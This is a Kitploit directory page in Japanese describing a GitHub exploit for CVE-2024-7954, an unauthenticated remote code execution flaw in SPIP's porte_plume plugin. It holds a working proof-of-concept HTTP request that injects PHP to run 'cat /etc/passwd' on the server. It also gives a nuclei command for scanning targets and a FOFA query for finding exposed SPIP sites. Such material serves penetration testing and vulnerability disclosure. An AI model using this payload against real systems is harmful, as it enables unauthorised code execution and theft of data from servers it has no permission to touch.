Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-7954-RCE — SPIP バージョン 4.2.12 以前における未認証のリモートコード実行 | Kitploit
ツール/GitHubGitHub/gh-ost00/cve-2024-7954-rce
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubgh-ost00/cve-2024-7954-rce

CVE-2024-7954-RCE

SPIP バージョン 4.2.12 以前における未認証のリモートコード実行

リポジトリを見る
9232年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

説明

SPIP 4.30-alpha2、4.2.13、4.1.16より前のバージョンで使用されるporte_plumeプラグインには、任意のコード実行の脆弱性があります。リモートかつ認証されていない攻撃者は、細工されたHTTPリクエストを送信することにより、SPIPユーザーとして任意のPHPコードを実行できます。

エクスプロイト(概念実証)

root@kitploit:~
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

data=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB

使用方法

root@kitploit:~
nuclei --target {host.com} -t CVE-2024-7954.yaml

FOFAクエリ

root@kitploit:~
app="SPIP"

参照

  • https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-0-alpha2-SPIP-4-2-13-SPIP-4.html
  • https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_1_the_feather/
  • https://vulncheck.com/advisories/spip-porte-plume
  • https://nvd.nist.gov/vuln/detail/CVE-2024-7954
  • https://security-tracker.debian.org/tracker/CVE-2024-7954
ツールをダウンロード